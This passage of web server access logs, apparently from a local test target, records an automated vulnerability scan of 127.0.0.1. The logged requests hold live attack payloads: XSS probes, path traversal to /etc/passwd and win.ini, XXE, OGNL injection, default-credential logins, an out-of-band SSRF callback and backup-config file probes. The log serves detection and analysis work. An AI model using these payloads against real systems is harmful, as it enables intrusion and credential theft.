"13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /responsiveUI/webmail/folder.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=297MdodO5jslgfW7VILe2gwfb5L.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"action=ucmm_mc_api&apiKey=-c9v8hn0smpv8c57g0t00784ph583b4d3o.oast.live%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:24 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.005","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico 